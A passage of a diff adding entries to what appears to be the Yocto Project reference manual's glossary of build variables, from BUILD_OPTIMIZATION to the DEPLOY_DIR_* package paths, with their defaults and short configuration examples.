+ Specifies the optimization flags passed to the C compiler when
+ building for the build host or the SDK. The flags are passed through
+ the :term:`BUILD_CFLAGS` and
+ :term:`BUILDSDK_CFLAGS` default values.
+
+ The default value of the ``BUILD_OPTIMIZATION`` variable is "-O2
+ -pipe".
+
+ :term:`BUILD_OS`
+ Specifies the operating system in use on the build host (e.g.
+ "linux"). The OpenEmbedded build system sets the value of
+ ``BUILD_OS`` from the OS reported by the ``uname`` command - the
+ first word, converted to lower-case characters.
+
+ :term:`BUILD_PREFIX`
+ The toolchain binary prefix used for native recipes. The OpenEmbedded
+ build system uses the ``BUILD_PREFIX`` value to set the
+ :term:`TARGET_PREFIX` when building for
+ ``native`` recipes.
+
+ :term:`BUILD_STRIP`
+ Specifies the command to be used to strip debugging symbols from
+ binaries produced for the build host. By default, ``BUILD_STRIP``
+ points to
+ ``${``\ :term:`BUILD_PREFIX`\ ``}strip``.
+
+ :term:`BUILD_SYS`
+ Specifies the system, including the architecture and the operating
+ system, to use when building for the build host (i.e. when building
+ ``native`` recipes).
+
+ The OpenEmbedded build system automatically sets this variable based
+ on :term:`BUILD_ARCH`,
+ :term:`BUILD_VENDOR`, and
+ :term:`BUILD_OS`. You do not need to set the
+ ``BUILD_SYS`` variable yourself.
+
+ :term:`BUILD_VENDOR`
+ Specifies the vendor name to use when building for the build host.
+ The default value is an empty string ("").
+
+ :term:`BUILDDIR`
+ Points to the location of the :term:`Build Directory`.
+ You can define this directory indirectly through the
+ :ref:`structure-core-script` script by passing in a Build
+ Directory path when you run the script. If you run the script and do
+ not provide a Build Directory path, the ``BUILDDIR`` defaults to
+ ``build`` in the current directory.
+
+ :term:`BUILDHISTORY_COMMIT`
+ When inheriting the :ref:`buildhistory <ref-classes-buildhistory>`
+ class, this variable specifies whether or not to commit the build
+ history output in a local Git repository. If set to "1", this local
+ repository will be maintained automatically by the ``buildhistory``
+ class and a commit will be created on every build for changes to each
+ top-level subdirectory of the build history output (images, packages,
+ and sdk). If you want to track changes to build history over time,
+ you should set this value to "1".
+
+ By default, the ``buildhistory`` class does not commit the build
+ history output in a local Git repository:
+ ::
+
+ BUILDHISTORY_COMMIT ?= "0"
+
+ :term:`BUILDHISTORY_COMMIT_AUTHOR`
+ When inheriting the :ref:`buildhistory <ref-classes-buildhistory>`
+ class, this variable specifies the author to use for each Git commit.
+ In order for the ``BUILDHISTORY_COMMIT_AUTHOR`` variable to work, the
+ :term:`BUILDHISTORY_COMMIT` variable must
+ be set to "1".
+
+ Git requires that the value you provide for the
+ ``BUILDHISTORY_COMMIT_AUTHOR`` variable takes the form of "name
+ email@host". Providing an email address or host that is not valid
+ does not produce an error.
+
+ By default, the ``buildhistory`` class sets the variable as follows:
+ ::
+
+ BUILDHISTORY_COMMIT_AUTHOR ?= "buildhistory <buildhistory@${DISTRO}>"
+
+ :term:`BUILDHISTORY_DIR`
+ When inheriting the :ref:`buildhistory <ref-classes-buildhistory>`
+ class, this variable specifies the directory in which build history
+ information is kept. For more information on how the variable works,
+ see the ``buildhistory.class``.
+
+ By default, the ``buildhistory`` class sets the directory as follows:
+ ::
+
+ BUILDHISTORY_DIR ?= "${TOPDIR}/buildhistory"
+
+ :term:`BUILDHISTORY_FEATURES`
+ When inheriting the :ref:`buildhistory <ref-classes-buildhistory>`
+ class, this variable specifies the build history features to be
+ enabled. For more information on how build history works, see the
+ ":ref:`dev-manual/dev-manual-common-tasks:maintaining build output quality`"
+ section in the Yocto Project Development Tasks Manual.
+
+ You can specify these features in the form of a space-separated list:
+
+ - *image:* Analysis of the contents of images, which includes the
+ list of installed packages among other things.
+
+ - *package:* Analysis of the contents of individual packages.
+
+ - *sdk:* Analysis of the contents of the software development kit
+ (SDK).
+
+ - *task:* Save output file signatures for
+ :ref:`shared state <overview-manual/overview-manual-concepts:shared state cache>`
+ (sstate) tasks.
+ This saves one file per task and lists the SHA-256 checksums for
+ each file staged (i.e. the output of the task).
+
+ By default, the ``buildhistory`` class enables the following
+ features:
+ ::
+
+ BUILDHISTORY_FEATURES ?= "image package sdk"
+
+ :term:`BUILDHISTORY_IMAGE_FILES`
+ When inheriting the :ref:`buildhistory <ref-classes-buildhistory>`
+ class, this variable specifies a list of paths to files copied from
+ the image contents into the build history directory under an
+ "image-files" directory in the directory for the image, so that you
+ can track the contents of each file. The default is to copy
+ ``/etc/passwd`` and ``/etc/group``, which allows you to monitor for
+ changes in user and group entries. You can modify the list to include
+ any file. Specifying an invalid path does not produce an error.
+ Consequently, you can include files that might not always be present.
+
+ By default, the ``buildhistory`` class provides paths to the
+ following files:
+ ::
+
+ BUILDHISTORY_IMAGE_FILES ?= "/etc/passwd /etc/group"
+
+ :term:`BUILDHISTORY_PUSH_REPO`
+ When inheriting the :ref:`buildhistory <ref-classes-buildhistory>`
+ class, this variable optionally specifies a remote repository to
+ which build history pushes Git changes. In order for
+ ``BUILDHISTORY_PUSH_REPO`` to work,
+ :term:`BUILDHISTORY_COMMIT` must be set to
+ "1".
+
+ The repository should correspond to a remote address that specifies a
+ repository as understood by Git, or alternatively to a remote name
+ that you have set up manually using ``git remote`` within the local
+ repository.
+
+ By default, the ``buildhistory`` class sets the variable as follows:
+ ::
+
+ BUILDHISTORY_PUSH_REPO ?= ""
+
+ :term:`BUILDSDK_CFLAGS`
+ Specifies the flags to pass to the C compiler when building for the
+ SDK. When building in the ``nativesdk-`` context,
+ :term:`CFLAGS` is set to the value of this variable by
+ default.
+
+ :term:`BUILDSDK_CPPFLAGS`
+ Specifies the flags to pass to the C pre-processor (i.e. to both the
+ C and the C++ compilers) when building for the SDK. When building in
+ the ``nativesdk-`` context, :term:`CPPFLAGS` is set
+ to the value of this variable by default.
+
+ :term:`BUILDSDK_CXXFLAGS`
+ Specifies the flags to pass to the C++ compiler when building for the
+ SDK. When building in the ``nativesdk-`` context,
+ :term:`CXXFLAGS` is set to the value of this variable
+ by default.
+
+ :term:`BUILDSDK_LDFLAGS`
+ Specifies the flags to pass to the linker when building for the SDK.
+ When building in the ``nativesdk-`` context,
+ :term:`LDFLAGS` is set to the value of this variable
+ by default.
+
+ :term:`BUILDSTATS_BASE`
+ Points to the location of the directory that holds build statistics
+ when you use and enable the
+ :ref:`buildstats <ref-classes-buildstats>` class. The
+ ``BUILDSTATS_BASE`` directory defaults to
+ ``${``\ :term:`TMPDIR`\ ``}/buildstats/``.
+
+ :term:`BUSYBOX_SPLIT_SUID`
+ For the BusyBox recipe, specifies whether to split the output
+ executable file into two parts: one for features that require
+ ``setuid root``, and one for the remaining features (i.e. those that
+ do not require ``setuid root``).
+
+ The ``BUSYBOX_SPLIT_SUID`` variable defaults to "1", which results in
+ splitting the output executable file. Set the variable to "0" to get
+ a single output executable file.
+
+ :term:`CACHE`
+ Specifies the directory BitBake uses to store a cache of the
+ :term:`Metadata` so it does not need to be parsed every time
+ BitBake is started.
+
+ :term:`CC`
+ The minimal command and arguments used to run the C compiler.
+
+ :term:`CFLAGS`
+ Specifies the flags to pass to the C compiler. This variable is
+ exported to an environment variable and thus made visible to the
+ software being built during the compilation step.
+
+ Default initialization for ``CFLAGS`` varies depending on what is
+ being built:
+
+ - :term:`TARGET_CFLAGS` when building for the
+ target
+
+ - :term:`BUILD_CFLAGS` when building for the
+ build host (i.e. ``-native``)
+
+ - :term:`BUILDSDK_CFLAGS` when building for
+ an SDK (i.e. ``nativesdk-``)
+
+ :term:`CLASSOVERRIDE`
+ An internal variable specifying the special class override that
+ should currently apply (e.g. "class-target", "class-native", and so
+ forth). The classes that use this variable (e.g.
+ :ref:`native <ref-classes-native>`,
+ :ref:`nativesdk <ref-classes-nativesdk>`, and so forth) set the
+ variable to appropriate values.
+
+ .. note::
+
+ ``CLASSOVERRIDE`` gets its default "class-target" value from the
+ ``bitbake.conf`` file.
+
+ As an example, the following override allows you to install extra
+ files, but only when building for the target:
+ ::
+
+ do_install_append_class-target() {
+ install my-extra-file ${D}${sysconfdir}
+ }
+
+ Here is an example where ``FOO`` is set to
+ "native" when building for the build host, and to "other" when not
+ building for the build host:
+ ::
+
+ FOO_class-native = "native"
+ FOO = "other"
+
+ The underlying mechanism behind ``CLASSOVERRIDE`` is simply
+ that it is included in the default value of
+ :term:`OVERRIDES`.
+
+ :term:`CLEANBROKEN`
+ If set to "1" within a recipe, ``CLEANBROKEN`` specifies that the
+ ``make clean`` command does not work for the software being built.
+ Consequently, the OpenEmbedded build system will not try to run
+ ``make clean`` during the :ref:`ref-tasks-configure`
+ task, which is the default behavior.
+
+ :term:`COMBINED_FEATURES`
+ Provides a list of hardware features that are enabled in both
+ :term:`MACHINE_FEATURES` and
+ :term:`DISTRO_FEATURES`. This select list of
+ features contains features that make sense to be controlled both at
+ the machine and distribution configuration level. For example, the
+ "bluetooth" feature requires hardware support but should also be
+ optional at the distribution level, in case the hardware supports
+ Bluetooth but you do not ever intend to use it.
+
+ :term:`COMMON_LICENSE_DIR`
+ Points to ``meta/files/common-licenses`` in the
+ :term:`Source Directory`, which is where generic license
+ files reside.
+
+ :term:`COMPATIBLE_HOST`
+ A regular expression that resolves to one or more hosts (when the
+ recipe is native) or one or more targets (when the recipe is
+ non-native) with which a recipe is compatible. The regular expression
+ is matched against :term:`HOST_SYS`. You can use the
+ variable to stop recipes from being built for classes of systems with
+ which the recipes are not compatible. Stopping these builds is
+ particularly useful with kernels. The variable also helps to increase
+ parsing speed since the build system skips parsing recipes not
+ compatible with the current system.
+
+ :term:`COMPATIBLE_MACHINE`
+ A regular expression that resolves to one or more target machines
+ with which a recipe is compatible. The regular expression is matched
+ against :term:`MACHINEOVERRIDES`. You can use
+ the variable to stop recipes from being built for machines with which
+ the recipes are not compatible. Stopping these builds is particularly
+ useful with kernels. The variable also helps to increase parsing
+ speed since the build system skips parsing recipes not compatible
+ with the current machine.
+
+ :term:`COMPLEMENTARY_GLOB`
+ Defines wildcards to match when installing a list of complementary
+ packages for all the packages explicitly (or implicitly) installed in
+ an image.
+
+ .. note::
+
+ The ``COMPLEMENTARY_GLOB`` variable uses Unix filename pattern matching
+ (`fnmatch <https://docs.python.org/3/library/fnmatch.html#module-fnmatch>`__),
+ which is similar to the Unix style pathname pattern expansion
+ (`glob <https://docs.python.org/3/library/glob.html>`__).
+
+ The resulting list of complementary packages is associated with an
+ item that can be added to
+ :term:`IMAGE_FEATURES`. An example usage of
+ this is the "dev-pkgs" item that when added to ``IMAGE_FEATURES``
+ will install -dev packages (containing headers and other development
+ files) for every package in the image.
+
+ To add a new feature item pointing to a wildcard, use a variable flag
+ to specify the feature item name and use the value to specify the
+ wildcard. Here is an example:
+ ::
+
+ COMPLEMENTARY_GLOB[dev-pkgs] = '*-dev'
+
+ :term:`COMPONENTS_DIR`
+ Stores sysroot components for each recipe. The OpenEmbedded build
+ system uses ``COMPONENTS_DIR`` when constructing recipe-specific
+ sysroots for other recipes.
+
+ The default is
+ "``${``\ :term:`STAGING_DIR`\ ``}-components``."
+ (i.e.
+ "``${``\ :term:`TMPDIR`\ ``}/sysroots-components``").
+
+ :term:`CONF_VERSION`
+ Tracks the version of the local configuration file (i.e.
+ ``local.conf``). The value for ``CONF_VERSION`` increments each time
+ ``build/conf/`` compatibility changes.
+
+ :term:`CONFFILES`
+ Identifies editable or configurable files that are part of a package.
+ If the Package Management System (PMS) is being used to update
+ packages on the target system, it is possible that configuration
+ files you have changed after the original installation and that you
+ now want to remain unchanged are overwritten. In other words,
+ editable files might exist in the package that you do not want reset
+ as part of the package update process. You can use the ``CONFFILES``
+ variable to list the files in the package that you wish to prevent
+ the PMS from overwriting during this update process.
+
+ To use the ``CONFFILES`` variable, provide a package name override
+ that identifies the resulting package. Then, provide a
+ space-separated list of files. Here is an example:
+ ::
+
+ CONFFILES_${PN} += "${sysconfdir}/file1 \
+ ${sysconfdir}/file2 ${sysconfdir}/file3"
+
+ A relationship exists between the ``CONFFILES`` and ``FILES``
+ variables. The files listed within ``CONFFILES`` must be a subset of
+ the files listed within ``FILES``. Because the configuration files
+ you provide with ``CONFFILES`` are simply being identified so that
+ the PMS will not overwrite them, it makes sense that the files must
+ already be included as part of the package through the ``FILES``
+ variable.
+
+ .. note::
+
+ When specifying paths as part of the ``CONFFILES`` variable, it is
+ good practice to use appropriate path variables.
+ For example, ``${sysconfdir}`` rather than ``/etc`` or ``${bindir}``
+ rather than ``/usr/bin``. You can find a list of these variables at
+ the top of the ``meta/conf/bitbake.conf`` file in the
+ :term:`Source Directory`.
+
+ :term:`CONFIG_INITRAMFS_SOURCE`
+ Identifies the initial RAM filesystem (initramfs) source files. The
+ OpenEmbedded build system receives and uses this kernel Kconfig
+ variable as an environment variable. By default, the variable is set
+ to null ("").
+
+ The ``CONFIG_INITRAMFS_SOURCE`` can be either a single cpio archive
+ with a ``.cpio`` suffix or a space-separated list of directories and
+ files for building the initramfs image. A cpio archive should contain
+ a filesystem archive to be used as an initramfs image. Directories
+ should contain a filesystem layout to be included in the initramfs
+ image. Files should contain entries according to the format described
+ by the ``usr/gen_init_cpio`` program in the kernel tree.
+
+ If you specify multiple directories and files, the initramfs image
+ will be the aggregate of all of them.
+
+ For information on creating an initramfs, see the
+ ":ref:`building-an-initramfs-image`" section
+ in the Yocto Project Development Tasks Manual.
+
+ :term:`CONFIG_SITE`
+ A list of files that contains ``autoconf`` test results relevant to
+ the current build. This variable is used by the Autotools utilities
+ when running ``configure``.
+
+ :term:`CONFIGURE_FLAGS`
+ The minimal arguments for GNU configure.
+
+ :term:`CONFLICT_DISTRO_FEATURES`
+ When inheriting the
+ :ref:`features_check <ref-classes-features_check>`
+ class, this variable identifies distribution features that would be
+ in conflict should the recipe be built. In other words, if the
+ ``CONFLICT_DISTRO_FEATURES`` variable lists a feature that also
+ appears in ``DISTRO_FEATURES`` within the current configuration, then
+ the recipe will be skipped, and if the build system attempts to build
+ the recipe then an error will be triggered.
+
+ :term:`COPYLEFT_LICENSE_EXCLUDE`
+ A space-separated list of licenses to exclude from the source
+ archived by the :ref:`archiver <ref-classes-archiver>` class. In
+ other words, if a license in a recipe's
+ :term:`LICENSE` value is in the value of
+ ``COPYLEFT_LICENSE_EXCLUDE``, then its source is not archived by the
+ class.
+
+ .. note::
+
+ The ``COPYLEFT_LICENSE_EXCLUDE`` variable takes precedence over the
+ :term:`COPYLEFT_LICENSE_INCLUDE` variable.
+
+ The default value, which is "CLOSED Proprietary", for
+ ``COPYLEFT_LICENSE_EXCLUDE`` is set by the
+ :ref:`copyleft_filter <ref-classes-copyleft_filter>` class, which
+ is inherited by the ``archiver`` class.
+
+ :term:`COPYLEFT_LICENSE_INCLUDE`
+ A space-separated list of licenses to include in the source archived
+ by the :ref:`archiver <ref-classes-archiver>` class. In other
+ words, if a license in a recipe's :term:`LICENSE`
+ value is in the value of ``COPYLEFT_LICENSE_INCLUDE``, then its
+ source is archived by the class.
+
+ The default value is set by the
+ :ref:`copyleft_filter <ref-classes-copyleft_filter>` class, which
+ is inherited by the ``archiver`` class. The default value includes
+ "GPL*", "LGPL*", and "AGPL*".
+
+ :term:`COPYLEFT_PN_EXCLUDE`
+ A list of recipes to exclude in the source archived by the
+ :ref:`archiver <ref-classes-archiver>` class. The
+ ``COPYLEFT_PN_EXCLUDE`` variable overrides the license inclusion and
+ exclusion caused through the
+ :term:`COPYLEFT_LICENSE_INCLUDE` and
+ :term:`COPYLEFT_LICENSE_EXCLUDE`
+ variables, respectively.
+
+ The default value, which is "" indicating to not explicitly exclude
+ any recipes by name, for ``COPYLEFT_PN_EXCLUDE`` is set by the
+ :ref:`copyleft_filter <ref-classes-copyleft_filter>` class, which
+ is inherited by the ``archiver`` class.
+
+ :term:`COPYLEFT_PN_INCLUDE`
+ A list of recipes to include in the source archived by the
+ :ref:`archiver <ref-classes-archiver>` class. The
+ ``COPYLEFT_PN_INCLUDE`` variable overrides the license inclusion and
+ exclusion caused through the
+ :term:`COPYLEFT_LICENSE_INCLUDE` and
+ :term:`COPYLEFT_LICENSE_EXCLUDE`
+ variables, respectively.
+
+ The default value, which is "" indicating to not explicitly include
+ any recipes by name, for ``COPYLEFT_PN_INCLUDE`` is set by the
+ :ref:`copyleft_filter <ref-classes-copyleft_filter>` class, which
+ is inherited by the ``archiver`` class.
+
+ :term:`COPYLEFT_RECIPE_TYPES`
+ A space-separated list of recipe types to include in the source
+ archived by the :ref:`archiver <ref-classes-archiver>` class.
+ Recipe types are ``target``, ``native``, ``nativesdk``, ``cross``,
+ ``crosssdk``, and ``cross-canadian``.
+
+ The default value, which is "target*", for ``COPYLEFT_RECIPE_TYPES``
+ is set by the :ref:`copyleft_filter <ref-classes-copyleft_filter>`
+ class, which is inherited by the ``archiver`` class.
+
+ :term:`COPY_LIC_DIRS`
+ If set to "1" along with the
+ :term:`COPY_LIC_MANIFEST` variable, the
+ OpenEmbedded build system copies into the image the license files,
+ which are located in ``/usr/share/common-licenses``, for each
+ package. The license files are placed in directories within the image
+ itself during build time.
+
+ .. note::
+
+ The ``COPY_LIC_DIRS`` does not offer a path for adding licenses for
+ newly installed packages to an image, which might be most suitable for
+ read-only filesystems that cannot be upgraded. See the
+ :term:`LICENSE_CREATE_PACKAGE` variable for additional information.
+ You can also reference the ":ref:`dev-manual/dev-manual-common-tasks:providing license text`"
+ section in the Yocto Project Development Tasks Manual for
+ information on providing license text.
+
+ :term:`COPY_LIC_MANIFEST`
+ If set to "1", the OpenEmbedded build system copies the license
+ manifest for the image to
+ ``/usr/share/common-licenses/license.manifest`` within the image
+ itself during build time.
+
+ .. note::
+
+ The ``COPY_LIC_MANIFEST`` does not offer a path for adding licenses for
+ newly installed packages to an image, which might be most suitable for
+ read-only filesystems that cannot be upgraded. See the
+ :term:`LICENSE_CREATE_PACKAGE` variable for additional information.
+ You can also reference the ":ref:`dev-manual/dev-manual-common-tasks:providing license text`"
+ section in the Yocto Project Development Tasks Manual for
+ information on providing license text.
+
+ :term:`CORE_IMAGE_EXTRA_INSTALL`
+ Specifies the list of packages to be added to the image. You should
+ only set this variable in the ``local.conf`` configuration file found
+ in the :term:`Build Directory`.
+
+ This variable replaces ``POKY_EXTRA_INSTALL``, which is no longer
+ supported.
+
+ :term:`COREBASE`
+ Specifies the parent directory of the OpenEmbedded-Core Metadata
+ layer (i.e. ``meta``).
+
+ It is an important distinction that ``COREBASE`` points to the parent
+ of this layer and not the layer itself. Consider an example where you
+ have cloned the Poky Git repository and retained the ``poky`` name
+ for your local copy of the repository. In this case, ``COREBASE``
+ points to the ``poky`` folder because it is the parent directory of
+ the ``poky/meta`` layer.
+
+ :term:`COREBASE_FILES`
+ Lists files from the :term:`COREBASE` directory that
+ should be copied other than the layers listed in the
+ ``bblayers.conf`` file. The ``COREBASE_FILES`` variable exists for
+ the purpose of copying metadata from the OpenEmbedded build system
+ into the extensible SDK.
+
+ Explicitly listing files in ``COREBASE`` is needed because it
+ typically contains build directories and other files that should not
+ normally be copied into the extensible SDK. Consequently, the value
+ of ``COREBASE_FILES`` is used in order to only copy the files that
+ are actually needed.
+
+ :term:`CPP`
+ The minimal command and arguments used to run the C preprocessor.
+
+ :term:`CPPFLAGS`
+ Specifies the flags to pass to the C pre-processor (i.e. to both the
+ C and the C++ compilers). This variable is exported to an environment
+ variable and thus made visible to the software being built during the
+ compilation step.
+
+ Default initialization for ``CPPFLAGS`` varies depending on what is
+ being built:
+
+ - :term:`TARGET_CPPFLAGS` when building for
+ the target
+
+ - :term:`BUILD_CPPFLAGS` when building for the
+ build host (i.e. ``-native``)
+
+ - :term:`BUILDSDK_CPPFLAGS` when building
+ for an SDK (i.e. ``nativesdk-``)
+
+ :term:`CROSS_COMPILE`
+ The toolchain binary prefix for the target tools. The
+ ``CROSS_COMPILE`` variable is the same as the
+ :term:`TARGET_PREFIX` variable.
+
+ .. note::
+
+ The OpenEmbedded build system sets the ``CROSS_COMPILE``
+ variable only in certain contexts (e.g. when building for kernel
+ and kernel module recipes).
+
+ :term:`CVSDIR`
+ The directory in which files checked out under the CVS system are
+ stored.
+
+ :term:`CXX`
+ The minimal command and arguments used to run the C++ compiler.
+
+ :term:`CXXFLAGS`
+ Specifies the flags to pass to the C++ compiler. This variable is
+ exported to an environment variable and thus made visible to the
+ software being built during the compilation step.
+
+ Default initialization for ``CXXFLAGS`` varies depending on what is
+ being built:
+
+ - :term:`TARGET_CXXFLAGS` when building for
+ the target
+
+ - :term:`BUILD_CXXFLAGS` when building for the
+ build host (i.e. ``-native``)
+
+ - :term:`BUILDSDK_CXXFLAGS` when building
+ for an SDK (i.e. ``nativesdk-``)
+
+ :term:`D`
+ The destination directory. The location in the :term:`Build Directory`
+ where components are installed by the
+ :ref:`ref-tasks-install` task. This location defaults
+ to:
+ ::
+
+ ${WORKDIR}/image
+
+ .. note::
+
+ Tasks that read from or write to this directory should run under
+ :ref:`fakeroot <overview-manual/overview-manual-concepts:fakeroot and pseudo>`.
+
+ :term:`DATE`
+ The date the build was started. Dates appear using the year, month,
+ and day (YMD) format (e.g. "20150209" for February 9th, 2015).
+
+ :term:`DATETIME`
+ The date and time on which the current build started. The format is
+ suitable for timestamps.
+
+ :term:`DEBIAN_NOAUTONAME`
+ When the :ref:`debian <ref-classes-debian>` class is inherited,
+ which is the default behavior, ``DEBIAN_NOAUTONAME`` specifies a
+ particular package should not be renamed according to Debian library
+ package naming. You must use the package name as an override when you
+ set this variable. Here is an example from the ``fontconfig`` recipe:
+ ::
+
+ DEBIAN_NOAUTONAME_fontconfig-utils = "1"
+
+ :term:`DEBIANNAME`
+ When the :ref:`debian <ref-classes-debian>` class is inherited,
+ which is the default behavior, ``DEBIANNAME`` allows you to override
+ the library name for an individual package. Overriding the library
+ name in these cases is rare. You must use the package name as an
+ override when you set this variable. Here is an example from the
+ ``dbus`` recipe:
+ ::
+
+ DEBIANNAME_${PN} = "dbus-1"
+
+ :term:`DEBUG_BUILD`
+ Specifies to build packages with debugging information. This
+ influences the value of the ``SELECTED_OPTIMIZATION`` variable.
+
+ :term:`DEBUG_OPTIMIZATION`
+ The options to pass in ``TARGET_CFLAGS`` and ``CFLAGS`` when
+ compiling a system for debugging. This variable defaults to "-O
+ -fno-omit-frame-pointer ${DEBUG_FLAGS} -pipe".
+
+ :term:`DEFAULT_PREFERENCE`
+ Specifies a weak bias for recipe selection priority.
+
+ The most common usage of this is variable is to set it to "-1" within
+ a recipe for a development version of a piece of software. Using the
+ variable in this way causes the stable version of the recipe to build
+ by default in the absence of ``PREFERRED_VERSION`` being used to
+ build the development version.
+
+ .. note::
+
+ The bias provided by ``DEFAULT_PREFERENCE`` is weak and is overridden
+ by :term:`BBFILE_PRIORITY` if that variable is different between two
+ layers that contain different versions of the same recipe.
+
+ :term:`DEFAULTTUNE`
+ The default CPU and Application Binary Interface (ABI) tunings (i.e.
+ the "tune") used by the OpenEmbedded build system. The
+ ``DEFAULTTUNE`` helps define
+ :term:`TUNE_FEATURES`.
+
+ The default tune is either implicitly or explicitly set by the
+ machine (:term:`MACHINE`). However, you can override
+ the setting using available tunes as defined with
+ :term:`AVAILTUNES`.
+
+ :term:`DEPENDS`
+ Lists a recipe's build-time dependencies. These are dependencies on
+ other recipes whose contents (e.g. headers and shared libraries) are
+ needed by the recipe at build time.
+
+ As an example, consider a recipe ``foo`` that contains the following
+ assignment:
+ ::
+
+ DEPENDS = "bar"
+
+ The practical effect of the previous
+ assignment is that all files installed by bar will be available in
+ the appropriate staging sysroot, given by the
+ :term:`STAGING_DIR* <STAGING_DIR>` variables, by the time the
+ :ref:`ref-tasks-configure` task for ``foo`` runs.
+ This mechanism is implemented by having ``do_configure`` depend on
+ the :ref:`ref-tasks-populate_sysroot` task of
+ each recipe listed in ``DEPENDS``, through a
+ ``[``\ :ref:`deptask <bitbake:bitbake-user-manual/bitbake-user-manual-metadata:variable flags>`\ ``]``
+ declaration in the :ref:`base <ref-classes-base>` class.
+
+ .. note::
+
+ It seldom is necessary to reference, for example, ``STAGING_DIR_HOST``
+ explicitly. The standard classes and build-related variables are
+ configured to automatically use the appropriate staging sysroots.
+
+ As another example, ``DEPENDS`` can also be used to add utilities
+ that run on the build machine during the build. For example, a recipe
+ that makes use of a code generator built by the recipe ``codegen``
+ might have the following:
+ ::
+
+ DEPENDS = "codegen-native"
+
+ For more
+ information, see the :ref:`native <ref-classes-native>` class and
+ the :term:`EXTRANATIVEPATH` variable.
+
+ .. note::
+
+ - ``DEPENDS`` is a list of recipe names. Or, to be more precise,
+ it is a list of :term:`PROVIDES` names, which
+ usually match recipe names. Putting a package name such as
+ "foo-dev" in ``DEPENDS`` does not make sense. Use "foo"
+ instead, as this will put files from all the packages that make
+ up ``foo``, which includes those from ``foo-dev``, into the
+ sysroot.
+
+ - One recipe having another recipe in ``DEPENDS`` does not by
+ itself add any runtime dependencies between the packages
+ produced by the two recipes. However, as explained in the
+ ":ref:`overview-manual/overview-manual-concepts:automatically added runtime dependencies`"
+ section in the Yocto Project Overview and Concepts Manual,
+ runtime dependencies will often be added automatically, meaning
+ ``DEPENDS`` alone is sufficient for most recipes.
+
+ - Counterintuitively, ``DEPENDS`` is often necessary even for
+ recipes that install precompiled components. For example, if
+ ``libfoo`` is a precompiled library that links against
+ ``libbar``, then linking against ``libfoo`` requires both
+ ``libfoo`` and ``libbar`` to be available in the sysroot.
+ Without a ``DEPENDS`` from the recipe that installs ``libfoo``
+ to the recipe that installs ``libbar``, other recipes might
+ fail to link against ``libfoo``.
+
+ For information on runtime dependencies, see the
+ :term:`RDEPENDS` variable. You can also see the
+ ":ref:`Tasks <bitbake:bitbake-user-manual/bitbake-user-manual-metadata:tasks>`" and
+ ":ref:`Dependencies <bitbake:bitbake-user-manual/bitbake-user-manual-execution:dependencies>`" sections in the
+ BitBake User Manual for additional information on tasks and
+ dependencies.
+
+ :term:`DEPLOY_DIR`
+ Points to the general area that the OpenEmbedded build system uses to
+ place images, packages, SDKs, and other output files that are ready
+ to be used outside of the build system. By default, this directory
+ resides within the :term:`Build Directory` as
+ ``${TMPDIR}/deploy``.
+
+ For more information on the structure of the Build Directory, see
+ ":ref:`ref-manual/ref-structure:the build directory - \`\`build/\`\``" section.
+ For more detail on the contents of the ``deploy`` directory, see the
+ ":ref:`Images <images-dev-environment>`", ":ref:`Package
+ Feeds <package-feeds-dev-environment>`", and
+ ":ref:`sdk-dev-environment`" sections all in the
+ Yocto Project Overview and Concepts Manual.
+
+ :term:`DEPLOY_DIR_DEB`
+ Points to the area that the OpenEmbedded build system uses to place
+ Debian packages that are ready to be used outside of the build
+ system. This variable applies only when
+ :term:`PACKAGE_CLASSES` contains
+ "package_deb".
+
+ The BitBake configuration file initially defines the
+ ``DEPLOY_DIR_DEB`` variable as a sub-folder of
+ :term:`DEPLOY_DIR`:
+ ::
+
+ DEPLOY_DIR_DEB = "${DEPLOY_DIR}/deb"
+
+ The :ref:`package_deb <ref-classes-package_deb>` class uses the
+ ``DEPLOY_DIR_DEB`` variable to make sure the
+ :ref:`ref-tasks-package_write_deb` task
+ writes Debian packages into the appropriate folder. For more
+ information on how packaging works, see the ":ref:`Package
+ Feeds <package-feeds-dev-environment>`" section
+ in the Yocto Project Overview and Concepts Manual.
+
+ :term:`DEPLOY_DIR_IMAGE`
+ Points to the area that the OpenEmbedded build system uses to place
+ images and other associated output files that are ready to be
+ deployed onto the target machine. The directory is machine-specific
+ as it contains the ``${MACHINE}`` name. By default, this directory
+ resides within the :term:`Build Directory` as
+ ``${DEPLOY_DIR}/images/${MACHINE}/``.
+
+ For more information on the structure of the Build Directory, see
+ ":ref:`ref-manual/ref-structure:the build directory - \`\`build/\`\``" section.
+ For more detail on the contents of the ``deploy`` directory, see the
+ ":ref:`Images <images-dev-environment>`" and
+ ":ref:`sdk-dev-environment`" sections both in
+ the Yocto Project Overview and Concepts Manual.
+
+ :term:`DEPLOY_DIR_IPK`
+ Points to the area that the OpenEmbedded build system uses to place
+ IPK packages that are ready to be used outside of the build system.
+ This variable applies only when
+ :term:`PACKAGE_CLASSES` contains
+ "package_ipk".
+
+ The BitBake configuration file initially defines this variable as a
+ sub-folder of :term:`DEPLOY_DIR`:
+ ::
+
+ DEPLOY_DIR_IPK = "${DEPLOY_DIR}/ipk"
+
+ The :ref:`package_ipk <ref-classes-package_ipk>` class uses the
+ ``DEPLOY_DIR_IPK`` variable to make sure the
+ :ref:`ref-tasks-package_write_ipk` task
+ writes IPK packages into the appropriate folder. For more information
+ on how packaging works, see the ":ref:`Package
+ Feeds <package-feeds-dev-environment>`" section
+ in the Yocto Project Overview and Concepts Manual.
+
+ :term:`DEPLOY_DIR_RPM`
+ Points to the area that the OpenEmbedded build system uses to place
+ RPM packages that are ready to be used outside of the build system.
+ This variable applies only when
+ :term:`PACKAGE_CLASSES` contains
+ "package_rpm".
+
+ The BitBake configuration file initially defines this variable as a
+ sub-folder of :term:`DEPLOY_DIR`:
+ ::
+
+ DEPLOY_DIR_RPM = "${DEPLOY_DIR}/rpm"
+
+ The :ref:`package_rpm <ref-classes-package_rpm>` class uses the
+ ``DEPLOY_DIR_RPM`` variable to make sure the
+ :ref:`ref-tasks-package_write_rpm` task
+ writes RPM packages into the appropriate folder. For more information
+ on how packaging works, see the ":ref:`Package
+ Feeds <package-feeds-dev-environment>`" section
+ in the Yocto Project Overview and Concepts Manual.
+
+ :term:`DEPLOY_DIR_TAR`
+ Points to the area that the OpenEmbedded build system uses to place
+ tarballs that are ready to be used outside of the build system. This
+ variable applies only when
+ :term:`PACKAGE_CLASSES` contains
+ "package_tar".
+
+ The BitBake configuration file initially defines this variable as a
+ sub-folder of :term:`DEPLOY_DIR`:
+ ::
+
+ DEPLOY_DIR_TAR = "${DEPLOY_DIR}/tar"
+
+ The :ref:`package_tar <ref-classes-package_tar>` class uses the
+ ``DEPLOY_DIR_TAR`` variable to make sure the
